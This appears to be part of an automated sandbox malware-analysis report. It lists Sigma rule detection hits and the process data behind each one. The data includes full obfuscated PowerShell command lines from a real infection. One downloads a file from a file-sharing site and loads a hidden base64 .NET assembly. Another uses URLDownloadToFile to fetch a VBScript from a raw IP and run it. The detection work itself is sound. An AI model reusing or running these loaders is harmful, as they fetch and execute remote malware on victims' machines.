oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , ProcessId: 5560, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtT
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", CommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICA
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT, ProcessId: 5732, ProcessName: powershell.exe
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3160, ParentProcessName: powershell.exe, 